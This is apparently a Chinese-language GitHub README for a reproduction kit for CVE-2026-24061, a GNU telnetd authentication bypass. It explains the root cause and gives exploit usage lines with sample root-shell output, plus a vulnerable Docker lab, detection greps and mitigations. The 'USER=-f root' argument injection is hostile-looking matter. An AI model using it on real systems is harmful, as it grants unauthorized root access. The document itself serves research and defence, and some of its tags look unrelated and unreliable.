anacarsi/CVEs-exploit-2026

GitHub: anacarsi/CVEs-exploit-2026

CVE-2026-24061 GNU Telnetd 身份验证绕过漏洞的完整复现工具,包含利用脚本、测试环境和检测方法。

Stars: 0 | Forks: 0

# CVE-2026-24061:GNU Telnetd 身份验证绕过 ## 概述 CVE-2026-24061 是 GNU telnetd 中的一个严重身份验证绕过漏洞,允许远程攻击者在无需凭据的情况下获取 root 权限。 - CVSS 评分:9.8(严重) - 受影响版本:GNU telnetd 2.7-2 及更早版本 - 发现者:Kyu Neushwaistein (Carlos Cortes Alvarez) - 2026 年 1 月 - 影响:在无需身份验证的情况下以 root 权限远程执行代码 ## 漏洞详情 该漏洞于 2015 年引入,原因是在 login 调用字符串中添加了 `%U` 占位符。该占位符会被 USER 环境变量替换,而攻击者可以通过 Telnet NEW-ENVIRON 选项控制该变量。通过将 USER 设置为 "-f root",攻击者可以将 `-f` 标志注入到 `/usr/bin/login` 中,从而完全跳过身份验证。 ## 根本原因 漏洞代码路径: 1. telnetd.c 定义:`LOGIN_INVOCATION "%U%p"` 2. %U 扩展为 `getenv("USER")` 3. 攻击者通过 Telnet NEW_ENVIRON 选项控制 USER 4. 服务器执行:`/usr/bin/login -f root` 5. `-f` 标志跳过身份验证,授予 root 访问权限 ## 攻击流程 ``` Client connects → Server requests NEW_ENVIRON → Client sends USER="-f root" → Server runs /usr/bin/login -f root → Root shell granted ``` ## 运行漏洞利用 基本用法: ``` python3 main.py python3 main.py -p 2323 # custom port ``` 示例: ``` python3 main.py 192.168.1.100 # [*] 已连接到 192.168.1.100:23 # root@vulnerable:~# whoami # root ``` ## 设置测试环境 方法 1 - Docker(推荐): ``` cd docker-setup docker build -t vulnerable-telnetd . docker run -d -p 2323:23 vulnerable-telnetd ``` 方法 2 - 安装受影响的软件包: ``` sudo apt-get install inetutils-telnetd=2:2.0-1ubuntu1 echo "telnet stream tcp nowait root /usr/sbin/telnetd telnetd" | sudo tee -a /etc/inetd.conf sudo service inetd restart ``` ## 检测 网络监控: ``` tcpdump -i any -n 'tcp port 23' -A | grep -i "NEW_ENVIRON" ``` 日志分析: ``` grep "/usr/bin/login -f" /var/log/auth.log grep "session opened for user root" /var/log/auth.log ``` ## 缓解措施 立即采取的行动: 1. 更新 GNU telnetd: ``` sudo apt-get update && sudo apt-get install inetutils-telnetd ``` 2. 禁用 Telnet: ``` sudo systemctl stop telnetd sudo systemctl disable telnetd ``` 3. 替换为 SSH: ``` sudo apt-get install openssh-server ``` 长期措施:消除 Telnet 的使用,迁移到 SSH,实施网络分段,并阻断 23 端口。 ## 法律免责声明 本材料仅用于教育和授权安全测试。请仅对您拥有或获得明确书面许可测试的系统进行测试。未经授权的访问是非法行为。 ## 参考资料 - CVE 条目:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24061 - Telnet 协议 (RFC 854):https://tools.ietf.org/html/rfc854 - Telnet 环境选项 (RFC 1572):https://tools.ietf.org/html/rfc1572 - SafeBreach Labs 分析 最后更新:2026-03-06
标签:BurpSuite集成, CVE-2026-24061, CVSS 9.8, Docker安全环境, GNU Telnetd, PE 加载器, PoC, RCE, Root权限, Telnet, 协议漏洞, 参数注入, 提权, 攻击流, 暴力破解, 漏洞复现, 环境变量注入, 编程工具, 网络安全, 请求拦截, 身份验证绕过, 远程代码执行, 逆向工具, 隐私保护, 零日漏洞